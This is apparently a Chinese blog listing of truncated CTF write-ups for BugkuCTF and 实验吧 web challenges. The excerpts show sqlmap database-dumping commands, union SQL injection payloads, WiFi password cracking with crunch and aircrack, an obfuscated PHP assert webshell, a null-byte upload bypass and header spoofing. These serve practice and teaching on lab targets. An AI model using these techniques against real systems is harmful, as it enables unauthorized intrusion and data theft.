- 博客(19)
- 收藏
- 关注
原创 BugkuCTF 想蹭网先解开密码
破解wifi密码 通过hint告诉了密码应该是电话号码 用 linux 的 crunch crunch 11 11 -t 1391040%%%% >>wifi.txt 最小11 最大11 -t 指定模式 @ 插入小写字母 , 插入大写字母 % 插入数字 ^ 插入特殊符号 aircrac...
2019-05-29 16:39:54
1209
原创 BugkuCTF 这是一个神奇的登陆框
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
2019-05-15 23:54:52
430
原创 BugkuCTF web8
代码审计 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ...
2019-05-15 23:11:52
553
原创 BugkuCTF 你从哪里来
提示的很明显 要从google访问 我们来看看访问一个页面我们的来源在哪看 百度搜索淘宝网 抓包 Referer中即可看到来源 现在来抓包添加Referer 得到flag flag:flag{bug-ku_ai_admin} ...
2019-05-14 22:12:29
666
原创 BugkuCTF 前女友(SKCTF)
打开看源代码发现有一个链接 点击进去 得到php源码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1...
2019-05-14 21:39:20
289
原创 BugkuCTF cookies欺骗
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....
2019-05-14 21:13:23
682
原创 BugkuCTF 字符?正则?
正则的题 <?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ d...
2019-05-14 20:38:58
524
原创 BugkuCTF 过狗一句话
点开链接没有任何内容,源代码也是 后台扫描也无果 回到提示 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> explode() ...
2019-05-14 18:31:11
600
原创 BugkuCTF welcome to bugkuctf
查看源代码 $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")) // $user必须存在 $user为文件且读出来...
2019-04-22 00:36:23
431
原创 BugkuCTF 成绩单
可以看出应该为sql联合注入 SQL注入之联合查询注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 构造语句 id=0' union select 1,2,3,4# 查询数据库 id=0' union select 1,2,3,database()#找到数据库 skctf_flag 查询数据表id=0...
2019-04-02 00:27:46
1231
2
原创 BugkuCTF flag在index里
查看源代码 没有任何提示 点击click me跳转到show.php php://filter 大佬解释 php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base64-encode/resource=php:/...
2019-04-01 15:42:20
272
原创 实验吧 天网管理系统
题目链接:http://ctf5.shiyanbar.com/10/web1/ 查看源代码 要求输入的用户名的值md5之后等于0 百度下就能知道很多md5为0的值 MD5加密后==’0’ 总结 找到新链接 $unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); i...
2019-03-28 09:36:53
422
原创 实验吧 忘记密码了
题目链接:http://ctf5.shiyanbar.com/10/upload/step1.php 随便输入邮箱找到./step2.php?email=youmail@mail.com&check=??? 打开step2 自动跳转回step1 抓包打开step2源代码 发现submit.php 且发现还需要taken值 打开submit.php提示you are not an admi...
2019-03-27 13:17:50
245
原创 实验吧 上传绕过
题目链接:http://ctf5.shiyanbar.com/web/upload/ 随便提交一个文件 需提交jpg,gif,png后缀的文件 随便提交一个jpg文件 上传后的文件必须后缀名为php 尝试修改上传包文件名后缀为php 没有效果 0x00截断 0x00是ascill值为0的字符,在某些函数和url中处理会把其当做结束符 抓包 添加语句 进入hex 修改+的16进制...
2019-03-26 18:50:54
212
原创 实验吧 看起来有点难
题目链接:http://www.shiyanbar.com/ctf/2 随便输入 “登录失败,错误的用户名和密码” 直接sqlmap跑 sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dbs 查到库test 查表 sql...
2019-03-26 17:27:20
293
原创 实验吧 NSCTF web200
题目链接:http://ctf5.shiyanbar.com/web/web200.jpg 加密 function encode ($str){ $_o = strrev($str); // 反转字符串 for ($_0=0;$_O<strlen($_o);$_O++); { // 所有字符ASCII值+1 $_c = substr($_o,$_O, 1)...
2019-03-25 18:59:45
519
原创 实验吧 程序逻辑问题
题目链接:http://ctf5.shiyanbar.com/web/5/index.php 查看源代码 找到index.txt php审计 <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db(...
2019-03-24 12:54:37
221
原创 实验吧 sql注入
题目链接:http://ctf5.shiyanbar.com/8/index.php?id=1 判断是否存在sql注入 ctf5.shiyanbar.com/8/index.php?id=1' 报错 ctf5.shiyanbar.com/8/index.php?id=1 and 1=1 正常打开 ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 ...
2019-03-23 22:27:12
341
原创 记第一篇博客
文章目录3tu6b0rnHello World!return 0; 3tu6b0rn 你好! 这是你第一次使用 优快云 所展示的欢迎页。 Hello World! 你将踏上一段新的征程 无论前途坎坷 只顾风雨兼程 return 0; ...
2019-03-22 23:06:46
181
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅